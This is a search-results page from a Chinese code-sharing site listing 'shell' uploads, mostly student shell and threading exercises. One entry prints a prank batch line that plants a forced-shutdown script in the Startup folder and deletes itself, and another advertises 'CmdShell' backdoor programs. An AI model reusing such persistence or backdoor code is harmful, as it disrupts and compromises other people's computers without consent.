搜索资源列表
GENIE-SHELL
- Genie-shell for ucos 一、 基本要求(必做) (1) 设计并实现ucos的shell模型 (2) 实现简单的Shell命令 hostname命令在屏幕上打印一句话,即自定义的本机名称。 hello 命令可以带多个参数,如hello a b c d,回车后会显示: hello,I am Genie your argv is: a b c d (3)实现在串口和LCD的同步显示,即所有的命令操作过程都要显示在串口和L
vcCreateThread
- 多线程编程 C++下如何创建线程 简单实例源码-multithreaded programming C threads how to create a simple example FOSS
linux下C语言编写的shell
- C语言编写的简单shell,计算机操作系统实验作业...你懂的
tic-tac-toe
- 一个简单的用二叉树实现的极大极小指算法人工智能井字棋游戏,使用C++的类,和STL模版库中的vector-A simple binary tree the minimax means algorithm artificial intelligence tic-tac-toe game of chess the class of C++, and STL template library in the vector
shell
- 在linux下用C语言实现简单的shell命令-A simple shell command under linux using C language
shell
- 简单的 Shell命令解析器的功能,创建子进程,并执行用户的命令,创建历史特性,当用户按下 Ctrl+C 键的时候打印出用户最近输入的10 个命令。包含实验报告-Simple Shell command parser function, creating a child process and execute user commands, to create history characteristics, when the user presses Ctrl+ C key when the u
shell
- 实现带参数的简单shell 1、除了系统调用execve,不允许使用其他的exec函数。输入应当允许带多个参数(一行内可以表示),不考虑通配符 (即“*”、“?”、“-”等等)的处理。 2、输入错误命令能提示出错并进入下一轮接收命令状态。 3、可以用Ctrl-C和Ctrl-\结束简单shell的运行。 4、程序运行正确,提示简洁明确。 -Parameters to achieve a simple shell 1, apart from the system call exe
cf
- 一个linux下的用c语言实现的一个简单的cf程序-Under a linux c language using a simple procedure cf
shell
- 这是一个c语言编写的一个简单的shell,可以实现一些基本的功能,新学的朋友可以参考一下。-This is a esay shell,hope can help you.
shell
- 这是一个简单的shell程序的设计。用的是c语言实现的基本的操作。-This is a simple shell program design. C language basic operation.
PrettyGirl
- 一个及其简单的自动关机脚本,作弄人用的。 @echo shutdown -s -t -c "世界崩溃了 :-(" 60 > ALLUSERSPROFILE \「开始~1\程序\启动\x.bat @del /f/q/a ~dpnx0 > nul -A simple and automatic shutdown scr ipts, for prank.
简单CmdShell的实现
- 6个CmdShell小后门,全部在Visual C++ 6.0通过编译,注释清晰。 我都上传了6个完整的小程序代码了,能不能让我下载一个小代码啊!!!???(6 CmdShell small back doors, all in the Visual C++ 6 through the compilation, clear annotation. I have uploaded 6 complete small program code, can let me download a smal
rkrselk
- ssm开发实现简单的oa办公管理系统,模板是网上下载,后端代码自己实现(SSM development and implementation of a simple OA office management system, templates are downloaded online, the back-end code to achieve their own.)